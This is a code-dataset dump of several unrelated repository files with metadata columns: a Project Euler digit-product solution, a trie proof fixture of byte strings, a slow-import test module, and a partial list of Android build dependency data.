68d9fe0fbefb5c6f1eca6bede9415f23a2f4dec3
| 1,431
|
py
|
Python
|
python/8.py
|
kstrikis/euler
|
a09cefc0762e093520f8c34aa059b618e3a62452
|
[
"Unlicense"
] | null | null | null |
python/8.py
|
kstrikis/euler
|
a09cefc0762e093520f8c34aa059b618e3a62452
|
[
"Unlicense"
] | null | null | null |
python/8.py
|
kstrikis/euler
|
a09cefc0762e093520f8c34aa059b618e3a62452
|
[
"Unlicense"
] | null | null | null |
## kstrikis' solution for project euler problem 8
## released under The Unlicense
## Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
from math import prod

number = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"


def largest_window_product(digits, window=13):
    """Return the greatest product of `window` adjacent digits in `digits`.

    `digits` is a string of decimal digits.  Converting once to ints and
    using math.prod avoids the original per-character Decimal arithmetic.
    """
    values = [int(ch) for ch in digits]
    return max(prod(values[i:i + window])
               for i in range(len(values) - window + 1))


print(largest_window_product(number))
| 102.214286
| 1,011
| 0.907757
| 68
| 1,431
| 19.102941
| 0.647059
| 0.020015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.756171
| 0.065688
| 1,431
| 13
| 1,012
| 110.076923
| 0.215408
| 0.140461
| 0
| 0
| 0
| 0
| 0.817661
| 0.817661
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0.1
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
68e86cd8391a48d18dbbd22ad22fae5d3abbf590
| 9,790
|
py
|
Python
|
tests/sample_proof_key_exists.py
|
unparalleled-js/py-trie
|
23e77052406836dc34b8472ddbc46430250e1750
|
[
"MIT"
] | 83
|
2017-11-27T09:22:39.000Z
|
2022-03-21T10:44:43.000Z
|
tests/sample_proof_key_exists.py
|
unparalleled-js/py-trie
|
23e77052406836dc34b8472ddbc46430250e1750
|
[
"MIT"
] | 95
|
2017-12-05T18:06:50.000Z
|
2022-03-11T03:51:18.000Z
|
tests/sample_proof_key_exists.py
|
unparalleled-js/py-trie
|
23e77052406836dc34b8472ddbc46430250e1750
|
[
"MIT"
] | 46
|
2017-11-28T16:53:17.000Z
|
2022-03-28T17:51:12.000Z
|
# flake8: NOQA: E501
# This proves that the given key (which is an account) exists on the trie rooted at this state
# root. It was obtained by querying geth via the LES protocol
# 32-byte root hash of the state trie the proof below is anchored to.
state_root = b'Gu\xd8\x85\xf5/\x83:e\xf5\x9e0\x0b\xce\x86J\xcc\xe4.0\xc8#\xdaW\xb3\xbd\xd0).\x91\x17\xe8'
# Trie key whose presence is being proven.  NOTE(review): presumably the
# keccak hash of the account address -- confirm against the consuming test.
key = b'\x9b\xbf\xc3\x08Z\xd0\xd47\x84\xe6\xe4S4ndG|\xac\xa3\x0f^7\xd5nv\x14\x9e\x98\x84\xe7\xc2\x97'
proof = ([b'\x01\xb2\xcf/\xa7&\xef{\xec9c%\xed\xeb\x9b)\xe9n\xb5\xd5\x0e\x8c\xa9A\xc1:-{<2$)', b'\xa2\xbab\xe5J\x88\xa1\x8b\x90y\xa5yW\xd7G\x13\x16\xec\xb3\xb6\x87S9okV\xa3\rlC\xbfU', b'\xd6\x06\x92\x9e\x0b\xd310|\xbeV\x9d\xb4r\xdf0\xa5Q\xfb\xec\xb9I\x8c\x96r\x81\xeb\xefX7_l', b'\xa8\x88\xed@\x04\x7f\xa6\xbe&\x89&\x89T\t+\xac\xb8w\x8a\xebn\x16\x0c\xe1n\xb4?\xad\x14\xfdF\xff', b'\xc9\t\xd0\xaa\xb0:P\xdc\xea\xedX%\x04\x9a\xbe\x1f\x16\x0cf\xbc\x04P#@\xfd\xd60\xad\xecK\x8b\x08', b'x\xff\xb2\x9ajO\xbc\x1bjR\x80$I\xe6\x95\xf6Tow\x82\xf9\x01\xa8V\xa9\xaa4\xa6`\x88\xf9\x10', b'I\x1cQc\x8a\xeda\xf8\xd1D\x01GT)\xc9\x02O\xef\x8d\xcc\\\xf9\xe6}\x8a~\xcc\x98~\xd5\xd6\xb6', b"U'\xa2\xa0 \xe4\xb1\xb6\xc3\xcd4C_\x9c]\xb3P\xa8w\xef\x8c\xde\xc2\x02^v\xcd\x12\xed%\x89\xa5", b'(\xa6x\xfa\xbe\xc3\x9a\xae\xaa\xe9\xbcv#u\\\xdfo\x14\x9a3\xbc\x89c\xc1\xfe\xdf[{|\x02P\x03', b'\xcf5\x07\x8f3\xa9\x1f\x19Q\xbb\x11\x8a\xb0\x97\xbe\x93\xb2\xd5~\xe2\xe06\x07\xc37\x08vg\x80 BD', b'U\x8e/\x95&\n\xc5\xf1\xd4\xc3\xb9\xa84Rd\xaa\x80\xfe8\xf1\xcf G\xcc\xe3\x99\x01\x07\xceH\x9a`', b'W\x1f\xb5\x1c\xec\xf7\x0b\x86\x15\r\xf9\xf9\x94\xcd|\xe6B\x9f\xa8l\x8d]D\xf7\xba\xee:\xc0\\\x11\xb8\x08', b'\xf5i\xee)\xc4\xd24\xfc\x8f\xba\xc0vS\x1dU>\xccz\xd18\n\xa2+\n\xcf\xe2i*\xee\x18\xe8\xc1', b'\x9dmSX\x1e\xee\xf7`\x1d\x0cO\xfcF\xe4\xbd\x0cE2\x10H6\xf0\x93|\xd5z\xe7=\xebbJ\xd6', b'u\x08\x92\x08\xa5Nl\x938\x03\xa3\xe2O\xe8\xfe\xb1\xc4\x87\x8c\xb8q\x9eb\x89b\x96\x98\xd7\xf22\xb9\xa2', b'\xa6V\xb5?\xcc\xd2\xc8*ME\xe7\xcf\xf8\xad\xf8\xdb\xe7\xf8\xf6D\xd5<\x1c\x95F\x13\x0e\x06rz\xe5m', b''], [b"\xb3\x03\xa9\xc11\x87mQ\xa1I2D4jg\xfe\xd0%k\xf2\r]\xb0\x0e\xeb'\x17\xedx\xc9Uj", b'L/\r$7-\xa5\xdf x\x9c\xbc\xc4\x99\x1e\xc5\xd8\xb5\xaf\xd1\xd1\xae\xe6L\xeco\xc4\xe2RUe\r', b'\xbeSp\xf5\xef\x02\xcd\x83\xb2\x0b\xa06\xfd\xca\xbb\xed_\xf2}\xf7\xea\xb3\x84\x17\xed\xcc\x19mF\x13(\xf3', b"\xfb$IYR\x9f\x04p\x01\x1d}\x88\x0b\xed'\x8e%\x9b\xc9\xeaN_\xab\xf9\xc9\x9d\xac\xa9\xb3\t\x1eq", b'\xaab\xeb\x14\xc2\xf6}%\xaa+0\xb5\xc1\x0f< 
\xc5ma\xb1c\xeb\xdd\xca\xc0\x90\xe2L\x8b\xe9\xfe/', b'\x91l\x9d\xa2\x84\xbf\xc1\x05\xe2S\x0e\xc9`\xc0^}Q!\xc4ml-\xec\xf4R$\xf6\x8a\xd3\xc6\xf1j', b'\xf3\x13\xde\xe0L\xdb\x96E`Q\xdf\xa1\x13\x01b5\xe4k\xde\xde\xbf\xb10\xaf\xe61Z\xdbZ\xd47\xf4', b'\t\x81\xb0\xea*\xec\xd0\xc3\x16\xee\xed~\xdc\x98e\x90\xf2~p\xbbSY\x19\xcfl\xc4)\x01\xc2\xd9\xc91', b'-\xda%\x8a\xc5jA-\xe5 lIp\xbe\xb3h\x98\x0f\x80q\xed\xab\x89KN\xdd\xa6\xcb;\x98\xb08', b'\x13\x97\x12f\xa31\xfa}\xf1\xfe\x19\xfa\x0b\xe6\x89\x9a\xcb\xf5\xed\xf3Q\x98O=\xa3\xb0e/\xd9\x9fy\x08', b'f\xba%\xfb\xbfE\x1d]\xb3\x05\xe4$\xa5\xd2G\xecc\xe5#\x0f,\x91\x8bN9a\x8a\xd1L\x16l\xa5', b'#p\x15\x8bU\x04\x88/K|4a\xfc\x0e.Zm^{\x15uk\x8d\xe4_\xfe\xee\xae\xb99\xd1\x8e', b'C \x9f\xb3y\xf3d.\x8b\t\x1cF\x9eL\x08\x07y\x08\xb9\xe1\xffM\x87\xfd\xd6\xfd\xdb\x8f\x94\x9e\x88\xc2', b'\x17X\x1f/\x8b\x82\xf5\xe4\x02\x84}\xbe\x9bz` \x94\'"_\x9c\xff\x06\t>\x8a\xd7oK\xf9\xf5w', b'6Q\x8db\xd8\\\x84_Rin\x18\x1f\x17\x89\x7f@\xd6\xbb%>\xafa\'\x80A\xa7\xd8}d\x07"', b'\xccgm\xf7\x05\xc8\xe4G\xf4\xb3\x18\xc7\\.\x0b\xa25]\xdc\x80w\xda\xc9;\xde\x9b\x03\xa0LS\xce\x8c', b''], [b'\xe4\xd3\x15\xe0\xaa\x0f\xf9\xd0\xa6\xc2\xc8B_\xaf"0\x8c\xea;\x91\xe4E\x04\xec\x901yZ\xd6>\xadc', b'wM\xce\x16JS:\xe96\x98\x12|\xa0\xc9~G\xbb\xc7u8\xc8\x93\x9b\x05\x92yh\xaa\xda\x94NK', b'\x89\xc7\xa2\xbd\xe1\xda\x06$|\xde\x03\xd9RS\x90\x84\xe7\x05\x0cc\xdfy\xb0\xfb@\x065\xdb8\xa9\xef\x1f', b'@\x11>\xe8\xb8\x19\xb7\xc7@\x92m$\x93 \x08\xc5\x15\xbd\x97\xb0;\xf5\x05q;\xb5\xc69\xd3E\xc4\x0e', b'\xd5_ol\x05o\x8e\xf0V\xd2\xa0n\xe7CxR\xc9\x92HTQhkc\x10K\xad\xfdU\xe9\x97\x8f', b'v\x7f\xc5KB\xdaYS\xa1\xbf \xda\xe2\x99\x84\xef,\x92\xdd\xc9\xb8\x9eo\xfcv(\x95\xff\x94t\xbc5', b"\xcbQ\x962!$\x1f\xdc\xdb\xfe\xef'\xc8\xc8O\xec\xa2\xae\xd3P\x88\xbf\xbd!\xea\x0e\xb0\x89\xe9\xdd\xf3w", b'H\xb8\x1b\xc3&\x86|!o\x003/\xc7K\xc9+,K\xe1y\xf2\x86\xa9*H\x05W\xcd\xf8\x8b\xb5\n', b'\x06\xc5\xa1\x83\xe4\xb4\xdc\xbf\xc0\x8c4Q\x93\x14W\xaf\xbb\xe9f\x82\xa2\x8d\xa3m\xda\xed\xc0W\x88UA\xd9', 
b'\x9czV\x7f$\xa8\xb9\xf3\xc1W0\x19\xac\xc5\xaap\x03?*\xe6\xd6\xee<\x0b\xafr\xf6ji\xd9\x87\xed', b'\xc7\x1d\xca\x95\xab~\xd3|\xa6\x9f\xba\x9e\xd5KxI\x95Y\xadx\xb8\xda\xa7!\xba\x93\xbbB,\x97n\xe4', b'\xd7"\x13\xca=\xa9|e\x11\x8f%\xb2^\x1b\xa6\xff\x93Z\x8b(\xca\xab\x12\xed\x8b3\x0f\xe0\xa7U\xa9\xe1', b'\xc2\xb4\x98\xb7\x08\x18#i7\x81\x85\xfd\xc3\xc6k\x12\x86\x99\xa55\x0c8\xd3\xbc\x9d\xc8\xe0\xd3\xcd=\xc6x', b'\xad\xf0\xea&\xf4\x8f=5\xe1\xb5b\xc1}\xba\xa1\n \xa4\xb7J2\x1f\xd7\xc9\x1d\xa4\xc2\xaf\xb7O\xb2\x12', b'\xd5~\x94\x99~Vy,4\xedMJ\x1a\xda3\xe7\x90\x91\xd4\xafw\xba\xbf\x89`\x0e\x99s\x93E\xdf%', b'\x82\xd2O\x16\xca{\x15\x87\xef-\x8a\xea\xb9\xcd\xfc\x82\x84\x99\xdco\xc1\x1eg\xf3-\x07\xf8\xa3\xed\xffx\x85', b''], [b"\xc5\xa5\xd38zu\xfc\xe9\xe2j\x97\xf0\x81T$\xee5\x94AC\xb1\x85\x0c\xef\x10\xcb`Z\xfcT'\xcb", b'ZU\xe4?lj\x05\xf8\xbc\xa7\xf1\xe4\xdb\x08M\x06\xad\xbf\xb3s\xfa\xcaS\xb9{U\xd2n\x981+|', b'l\x0cL\xfb\\(g\xb47\xc2<\xcb\x14\xf3\xa9l\x01#\xdb"|\xdc\xfd\xa0#\xa2\x89\xcfx\x97\xb4\x8e', b'\x0b\xe7$\x1d\xa2\x1c\\\xa5)t\xd6\x82\xec\xed\x02]\xdd\xefz\xa3C`\x1b\xda\x81\t\xb3\x14\xdf5\xbb\xcb', b'\xe7%b2\xd4\xc6\x98\x90\xd8:B\xa4\x9e\n\xc6\xa1\x01\xac\x94\xbdr\xca\xdd\x8a\xa8\xe8\xc6F\xed\x04\xe9\x14', b'\xa7\xac\xc0S\xcbo\x98\xebJ)\xb1\x8b{\xda,\x98\xf2M\xca,\xcd\xc4%\x94\xe4\xdc<\xf5o}\x90\x1d', b'[\xd9}F\xe2\n\x84\xbc\xa0\x81\x0f\xb9\x0b]\x0c\x10%\x9d\r\x00RZgbV*2b\xd1z\xb5\xd3', b'\xac\xcag\xdb\xc3y\x91\x82\xddu\xad\x85%g\x82\xa0\r\xf4\x99^=\x14h\xee\xac\x81/o\xe6\xe4\xec\x0c', b'8\xeb\xed\x80}2\xd9.\x0e\xeb\x92\xa7\xae\xeb\x8d\x9b>8<\x9d\xc4\x05\xf2W;F\xce!\t\x15\xb2\xe3', b'*\xed\xbfJ\x80\x9f7\xd1\xcd\xeft\x89.e\x02M\r\x85D-\x9bL\x8d\xac*3h\xf3\x9f\xde\xe0F', b'd\xf9\xdf\xfb\xfa`\x97:\x11\xc4\x89u_\xe9&\xd0LX;r\x12\x86\\,}\x7f:\xbc\xf9\x9a\xd2\xe9', b'\x94\x80\xd4\xb8\xe4\xa6\xd4\x9cS\xcc\xc7*xo]2y~\xd6\x18a\xfb\xafP\x19\x87\xe7:\xb1r\x96\xdc', b'\x1c\xdar\xc1\x18\x1f\x0b\xf3\xe2\xf0\xf1<\x05\x88\xa4\x01J,\xc2\xa1\xbd`L\x8b\x95\xa6\xbdze4&\xc1', 
b'>0\x01SdF=\x8c\xa7\x1d4\x1elOt\xcd;,|\xf0l\xe9O\x83\xf3\xc0rm\xb6\x82\xaa\x08', b'\xd0\xef\x12\xc5<\\\x00\x82$\x98\x8d\xb6\xa7l\xd6w\xa3\x00<D\x15\xf7\xd6\xc9\xd0\xfb\xd3\x9f\xed,\x9e\xf7', b'\xa6->\xb1\x80jz\xc3\x8a,5\xb8\xf8\xbf\xb4^\x880\x824A\xfa\xbf\x0e\x1f\x9b /\x02\xadhx', b''], [b"\xc1\x17\xa1{\x135'>\xce\x8a\xe8;\x84V\x8c\xfer\xdaZS\xc7v\xd7\x18\xfb\xe3\xbf\xff\x92\x87@D", b'\x06\xb9c\xad\x8d2\xc0WU\xaf"w\xe5>\x1a\xfd\x02\xf1\xdd\x91$h/\x02)\xc6\xd3\xbc\x17\xc42\xe8', b'\xc4\xa2\xb3*k\xa8\xc8\x124\x86\xa0\x9b\xad\xfa\xb9$5?\xc6\x0c]\x98Kb\xd13\xdb:\x85\xed\xe1[', b'%\xa4>aM\x08\xbet\x1b\xc8\xb5\xf2c.9o!\x03G\x99_\n\xef\x93OA^\xabC\x91\xce\x97', b'\xc9T\xc1\xf6\xc8\xbe\xd8h\x86\xfey\x82Evg\xe1zP\x9ct\x98(\x01\xf5\xfc\xf8\xbe\xf6\x1d\xc0\x15\x8e', b'\xd3\xf1\xe6T\xd7"\xba\xdeipC\xe5\xe1\x04\x0e?o\x84\xcb\x1aE\x18\xd0\xa36\x0eC\xc7D>\x12 ', b'\xe0\x06\x0c\xaf\xec\xe3op*j\xcd\x84\xef\x9b\x82a{,\x1c\x98\xba-\x10\xf9\x7f+\xb6\x8a/q,\xeb', b"\x8a'\xeb\x1a\xe8i\x91S\xf3;\xa8[f-\xb02\x01?\xac\xe4Ds\xd8E\xa0\x87\x8a\xec]\x9b?\x9e", b'\xcf\x0cM\xbd\x92\xbbaS\x9d\xd0:\x7f\xfe\xd5\x08\xac\xe4\xb5\x81ga\xc2>\\\x89\x95\x08\xd6C\xf9\xe6\xb7', b'\x9bh\xd3\xb0x\xf0\xfa5\xa6vV\x96_\x16\x9dx\x95B2\xa9\xcem\xc8\xb9\xaf\xb9\xff\n\xae\xc7\x14\x13', b'H\x03\x82\xd6\xbd\x00Z\r\xa03YQ\xa4\xfa\xcdl\xea8g{L\x16\x18\xca\xdb\xb75~\xff\x1b]&', b'A?l1\xbf\x04\xc3Qs\x9b\x08c\xc3|\xf5D6\xa2\x82\xf8\xd3\xf4@\xab\xa0oDx\xc4\xffY*', b'\x0c\xd7U\x880\xa0\xd3\xad\xdd\xda\xdb\x01\xac\x99ya:\xeb\xab8K%\xaf\xc4\xf1G\xd3*\xb7\xae\x01*', b'\xb8s\xab\x0e\xf4\x90\xdb\xce\x0b)l\xb3\x7f\xf1p\xc6&\x0eh\xfb\xc8\xd7\x88`\xcd\xdc\x97-l\xb6L\x82', b'x\xf2\x15\x85\xe9\x01\xd8\xdc\xc5\xbc\xb7\xda\xcd$\xf0\xae\xc9\x01\xcdHZ\xb8)\x97\x11\xff\xcc7\xa5\x98\xb4\xb6', b'\xf3\xb6\xdd\xe9\xb1\x93\x08A\xda\xa39\xfe$\x8dO\n$ Mn"-\'\xa5$F5\xae\xcd>\xa2\x0c', b''], [b'\x82\x8b\x9d\x85\x0b/\x83\xacmb\x07\x89h\xa5\x86R\x8e\xf4\xd9_\x00\t\xeb\xb3>\\@\x11\xecOp\x7f', b'', b'', 
b'"\xee\xd9\x89<\xc3_\xca\xe9\xed\xc2v\r,\x9e\x10\x1c\x07\xe8E\xbd\x10\x9a\x16_:hk\xb9Om\xf2', b'', b'', b'\x11]i\xb3t6\xabKF\xc0\xa9\x81z&\xdf\x02\xcaRQ\x82\x92\xac\xf1\xf9~\x94\x94tM9\xbe\x1a', b'\xd0dY\xbc\xbe\xe5\xa8\x93\xc8e\xbd\x15\xf8\xb6b\x9a+\xbeh\xeb\x9d\x85\x1f(\xee\xd5\xb2 \xf2\xea\xa1\xf2', b'', b'`\xa8\xcd0:I\xdd\xd7\xa1\xc9W\r\x00\xa6\x1b\x0cM\xbb8\xb0Z\x8b\xe2\x87\x16\x0f\x99U\xf7\xdf\xc4U', b'', b'\xbcR\x17x\x12Y\xf1r\xb9c\xf5\x17#\xcd\xdb\xd5\x1c0\xd2\xda~\x99a\x96\xd5k\xef\x94\x0f\xd0$\xcb', b'!\x16\xaee\xb5H7X\xd5\tA\xb5{\x98\x8f\x12\x0bX\x85K\x184\x04\xcf\x80\x17\xf81V\xbc\xed\x9c', b'\x00\x08C^\xb5\xcfb\xb3\x13\xf0\x95S\x8eyQ\xe8\xdf\x9bI\xfe\xa2\x9c\x91@_\x16\x9d\x82w,u\x86', b'6&\x99Z\xae\xe6r\xab\xec\xb3X\x87\\\x02\x99>\xfa\xebP:\xd5\xd2t\xe2p\xc7\xe2\xe0\x0e\x95\xf9D', b'\xcf\x7f\x99\x9a\x1c\x18\xa6\x9av\xe6\xa2\xd5\xb3E\x8aJ\x18\xa7\x8c\xc0\x07\xda\xe9\x0bi\r\t\x0f\x9b\x06\xf8S', b''], [b'\x07\x83C\xd1X\xdf\xddJ\xd4\xf2\x7f3+\n\x95\xb2\x89\xd2"\x9d\xc5S\xfb\xfc\x9ed\x8d\xd2\xd2\xe5\x99B', b'', b'', b'', b'', b'-m2\x00\xef\x95\xcd\xfe\xf8\x9e\x0b\xbf\xae\xd8\xb4\xd2\xa1*\xfde\xaa\xb1\x8a\xdd\x1d\x07\x03\xc7,<\xe8\xe7', b'', b'', b'', b'', b'', b'', b'', b'', b'', b'', b''], [b'8Z\xd0\xd47\x84\xe6\xe4S4ndG|\xac\xa3\x0f^7\xd5nv\x14\x9e\x98\x84\xe7\xc2\x97', b'\xf8D\x01\x80\xa0U\xbd\x1daQ\x97{bg,!\xc2uK\xbe\xeb;\x82x\xb2\xe0\xc3\x8e\xdc\xd9I\x84n\xe3b\x8b\xf1\xa0\x1e\x0b*\xd9p\xb3e\xa2\x17\xc4\x0b\xcf5\x82\xcb\xb4\xfc\xc1d-z]\xd7\xa8*\xe1\xe2x\xe0\x10\x12>'])
| 1,398.571429
| 9,403
| 0.700919
| 2,236
| 9,790
| 3.06127
| 0.306351
| 0.007889
| 0.006574
| 0.006428
| 0.019138
| 0.018408
| 0.018408
| 0.018408
| 0.018408
| 0.018408
| 0
| 0.213505
| 0.018284
| 9,790
| 6
| 9,404
| 1,631.666667
| 0.498699
| 0.017467
| 0
| 0
| 0
| 18
| 0.844514
| 0.823505
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ec0c61a5fceea21f629d2c368718e70bd0804a26
| 90
|
py
|
Python
|
polls/slow_import.py
|
mrfleap/django-turboreload
|
9c90ca9a46d54c421f18ff0dfcfd3e8805dd593d
|
[
"MIT"
] | null | null | null |
polls/slow_import.py
|
mrfleap/django-turboreload
|
9c90ca9a46d54c421f18ff0dfcfd3e8805dd593d
|
[
"MIT"
] | null | null | null |
polls/slow_import.py
|
mrfleap/django-turboreload
|
9c90ca9a46d54c421f18ff0dfcfd3e8805dd593d
|
[
"MIT"
] | null | null | null |
import time
# Deliberately slow-to-import module.  NOTE(review): presumably a fixture for
# exercising django-turboreload's handling of expensive imports -- confirm.
print("Slow import starting")
time.sleep(0.05)  # artificial ~50 ms delay standing in for heavy import-time work
print("Slow import finished")
| 15
| 29
| 0.755556
| 14
| 90
| 4.857143
| 0.642857
| 0.264706
| 0.441176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0375
| 0.111111
| 90
| 5
| 30
| 18
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
ec456a9461cfa53a2f0be8a212d2c2b9b280fe49
| 12,504
|
py
|
Python
|
projectinfo/test.py
|
lifecake/Project-build-info
|
6594c41933af3351d5ad62510cd84f004f675f9a
|
[
"Apache-2.0"
] | null | null | null |
projectinfo/test.py
|
lifecake/Project-build-info
|
6594c41933af3351d5ad62510cd84f004f675f9a
|
[
"Apache-2.0"
] | null | null | null |
projectinfo/test.py
|
lifecake/Project-build-info
|
6594c41933af3351d5ad62510cd84f004f675f9a
|
[
"Apache-2.0"
] | null | null | null |
import json
#
# {
# "applicationId":"com.neulion.f",
# "applicationName":"f",
# "applicationVersion":"8.0602",
# "librarys": [
# {
# "libraryName":"track-core",
# "libraryVersion":"6"
# },{
# "libraryName":"track-ga",
# "libraryVersion":"6"
# },{
# "libraryName":"player",
# "libraryVersion":"5.0.0"
# }
# ]
# }
tempdata = [{"package":"com.neulion.firetv.ufc.android.amazon.dev","packageName":"ufc-tv","productFlavorName":"amazon","packageVersionCode":"103","packageVersionName":"8.0613","packageTargetSdk":"27","packageMiniSdk":"21","deepLinkScheme":"amazon_ufctv","packageMappingUrl":"","libraryCoordinateList":[{"group":"com.android.tools.lint","name":"lint-gradle","currentVersion":"26.1.2"},{"group":"org.jetbrains.kotlin","name":"kotlin-annotation-processing-gradle","currentVersion":"1.2.41"},{"group":"com.crashlytics.sdk.android","name":"crashlytics","currentVersion":"2.8.0"},{"group":"com.squareup.leakcanary","name":"leakcanary-android","currentVersion":"1.5.4"},{"group":"com.squareup.leakcanary","name":"leakcanary-android-no-op","currentVersion":"1.5.4"},{"group":"org.jetbrains.kotlin","name":"kotlin-stdlib-jdk8","currentVersion":"1.2.41"},{"group":"com.google.android.gms","name":"play-services-analytics","currentVersion":"11.8.0"},{"group":"com.android.databinding","name":"baseLibrary","currentVersion":"3.1.2"},{"group":"com.neulion.android.app","name":"core","currentVersion":"0.5.3-SNAPSHOT"},{"group":"com.neulion.android.iap","name":"iap-amazon","currentVersion":"2.1.0-SNAPSHOT"},{"group":"android.arch.lifecycle","name":"extensions","currentVersion":"1.1.1"},{"group":"com.android.support","name":"support-annotations","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"adapters","currentVersion":"3.1.2"},{"group":"com.android.support","name":"recyclerview-v7","currentVersion":"27.0.2"},{"group":"com.jakewharton","name":"butterknife-compiler","currentVersion":"8.8.1"},{"group":"com.neulion.android","name":"service-v5","currentVersion":"3.0.12"},{"group":"com.android.databinding","name":"library","currentVersion":"3.1.2"},{"group":"com.android.support","name":"appcompat-v7","currentVersion":"27.0.2"},{"group":"com.android.support","name":"leanback-v17","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"compiler","currentVersion":"3.1.2"
},{"group":"com.jakewharton","name":"butterknife","currentVersion":"8.8.1"},{"group":"com.neulion.android.media","name":"NeuPlayer","currentVersion":"4.7.2-SNAPSHOT"},{"group":"com.android.support","name":"design","currentVersion":"27.0.2"},{"group":"com.android.support","name":"multidex-instrumentation","currentVersion":"1.0.2"},{"group":"com.android.support","name":"cardview-v7","currentVersion":"27.0.2"},{"group":"com.neulion.android.iap","name":"iap-google","currentVersion":"2.1.0-SNAPSHOT"},{"group":"com.neulion.android.tracking","name":"tracker-ga","currentVersion":"4.3.2"},{"group":"com.neulion.android","name":"uikit-fresco","currentVersion":"1.1.12-SNAPSHOT"},{"group":"com.neulion.android","name":"appengine","currentVersion":"2.4.0"},{"group":"com.android.support","name":"multidex","currentVersion":"1.0.2"},{"group":"com.android.support","name":"support-v4","currentVersion":"27.0.2"},{"group":"com.android.support.constraint","name":"constraint-layout","currentVersion":"1.1.0"},{"group":"uk.co.chrisjenx","name":"calligraphy","currentVersion":"2.3.0"},{"group":"com.neulion.android","name":"commonparser","currentVersion":"3.0.4"}]},{"package":"com.neulion.firetv.ufc.android.amazon.dev","packageName":"ufc-tv","productFlavorName":"google","packageVersionCode":"103","packageVersionName":"8.0613","packageTargetSdk":"27","packageMiniSdk":"21","deepLinkScheme":"google_ufctv","packageMappingUrl":"","libraryCoordinateList":[{"group":"com.android.tools.lint","name":"lint-gradle","currentVersion":"26.1.2"},{"group":"org.jetbrains.kotlin","name":"kotlin-annotation-processing-gradle","currentVersion":"1.2.41"},{"group":"com.crashlytics.sdk.android","name":"crashlytics","currentVersion":"2.8.0"},{"group":"com.squareup.leakcanary","name":"leakcanary-android","currentVersion":"1.5.4"},{"group":"com.squareup.leakcanary","name":"leakcanary-android-no-op","currentVersion":"1.5.4"},{"group":"org.jetbrains.kotlin","name":"kotlin-stdlib-jdk8","currentVersion":"1.2.41"},{"group":"co
m.google.android.gms","name":"play-services-analytics","currentVersion":"11.8.0"},{"group":"com.android.databinding","name":"baseLibrary","currentVersion":"3.1.2"},{"group":"com.neulion.android.app","name":"core","currentVersion":"0.5.3-SNAPSHOT"},{"group":"com.neulion.android.iap","name":"iap-amazon","currentVersion":"2.1.0-SNAPSHOT"},{"group":"android.arch.lifecycle","name":"extensions","currentVersion":"1.1.1"},{"group":"com.android.support","name":"support-annotations","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"adapters","currentVersion":"3.1.2"},{"group":"com.android.support","name":"recyclerview-v7","currentVersion":"27.0.2"},{"group":"com.jakewharton","name":"butterknife-compiler","currentVersion":"8.8.1"},{"group":"com.neulion.android","name":"service-v5","currentVersion":"3.0.12"},{"group":"com.android.databinding","name":"library","currentVersion":"3.1.2"},{"group":"com.android.support","name":"appcompat-v7","currentVersion":"27.0.2"},{"group":"com.android.support","name":"leanback-v17","currentVersion":"27.0.2"},{"group":"com.android.databinding","name":"compiler","currentVersion":"3.1.2"},{"group":"com.jakewharton","name":"butterknife","currentVersion":"8.8.1"},{"group":"com.neulion.android.media","name":"NeuPlayer","currentVersion":"4.7.2-SNAPSHOT"},{"group":"com.android.support","name":"design","currentVersion":"27.0.2"},{"group":"com.android.support","name":"multidex-instrumentation","currentVersion":"1.0.2"},{"group":"com.android.support","name":"cardview-v7","currentVersion":"27.0.2"},{"group":"com.neulion.android.iap","name":"iap-google","currentVersion":"2.1.0-SNAPSHOT"},{"group":"com.neulion.android.tracking","name":"tracker-ga","currentVersion":"4.3.2"},{"group":"com.neulion.android","name":"uikit-fresco","currentVersion":"1.1.12-SNAPSHOT"},{"group":"com.neulion.android","name":"appengine","currentVersion":"2.4.0"},{"group":"com.android.support","name":"multidex","currentVersion":"1.0.2"},{"group":"com.android.support"
